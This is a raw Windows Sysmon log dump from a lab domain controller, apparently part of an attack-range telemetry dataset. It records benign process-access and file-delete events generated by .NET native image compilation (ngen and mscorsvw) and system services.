|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.668{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.668{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.668{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.652{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7005-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.652{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-7005-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.652{4DB9351A-A278-60D3-6F05-00000000CF01}6376NT 
AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BJV9NZKB6I\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.ni.dll.auxMD5=3116AE83A001A57D8A0AC3A3C0E00C4C,SHA256=3DC3FA50E17574809D90FE0EFC751634F93AC1C6643900A3B1D6A4617C0BB02B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.652{4DB9351A-A278-60D3-6F05-00000000CF01}6376NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BJV9NZKB6I\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.ni.dllMD5=43FA2D04275CD778B7B51DC684A65077,SHA256=35FA711EBE1965E954A2FEF3827A83FACDADF4CF29E9114ECAC63078C1C1CA52,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.621{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6F05-00000000CF01}6376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.605{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6F05-00000000CF01}6376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.605{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6F05-00000000CF01}6376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 
23542300x800000000000000023057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.589{4DB9351A-A278-60D3-6E05-00000000CF01}3032NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZUAMRL02BB\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.ni.dll.auxMD5=8C2A22B3CD88B40DC446C70D87A56EEF,SHA256=2EA186619BDE29E202766505F6F36104C0B4146B69CC854894622C6E98F83955,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.589{4DB9351A-A278-60D3-6E05-00000000CF01}3032NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZUAMRL02BB\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.ni.dllMD5=828C84D7FE88738099459981F8E7A197,SHA256=0C144504E36C65B1386AB87EA7090E5B9F2EFBCEBB954214E41603F43FF7F689,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.574{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6E05-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.558{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6E05-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.558{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6E05-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.558{4DB9351A-A278-60D3-6D05-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FO80E3RVS3\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.ni.dll.auxMD5=05AE273C5F41B8F3431D524E37B5D380,SHA256=4DF840257A31177D9B81A071593C3485601209C4A65EEE814959F72EE06C531D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.558{4DB9351A-A278-60D3-6D05-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FO80E3RVS3\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.ni.dllMD5=75A461DFCF6E9B5214A2DD8D11126FFD,SHA256=792FB2F756405E27C564AF3E129F941AE988748A0065855E7F13D9AF6DF5C0DC,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.527{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6D05-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.496{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6D05-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.496{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6D05-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.496{4DB9351A-A278-60D3-6C05-00000000CF01}6500NT 
AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3PFTMNKWIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.ni.dll.auxMD5=53B6F459EA32C563A98746EF6CFB2EE1,SHA256=984444B75447D00BAF371C721B161536C5A534E6BBD02FCF733E97D7AAEF7E5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.496{4DB9351A-A278-60D3-6C05-00000000CF01}6500NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3PFTMNKWIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.ni.dllMD5=D788404C7AB0F22FD210B80CCDEA08D6,SHA256=76C00F6E14E8E80B94DD4DE0A38555F91BAFFD55E31FAAFAC801D36B1EA4DDB4,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.464{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6C05-00000000CF01}6500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.449{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6C05-00000000CF01}6500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.449{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6C05-00000000CF01}6500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 
23542300x800000000000000023042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.433{4DB9351A-A278-60D3-6B05-00000000CF01}2728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QDK4SNQ125\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.ni.dll.auxMD5=2A97AAF91EC661291BE4C50D7ED9AB0F,SHA256=212AC6BF7365F720C8C4731A9EBCFF6553BFE36BB3C751EB992964EBF18BFB48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.433{4DB9351A-A278-60D3-6B05-00000000CF01}2728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QDK4SNQ125\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.ni.dllMD5=C4095DF3F0E223A7AED2FB487CD59141,SHA256=752A1BC57240F1D8E81C8B19C954C412E6C358F426D635C3565730635FD9B5B6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 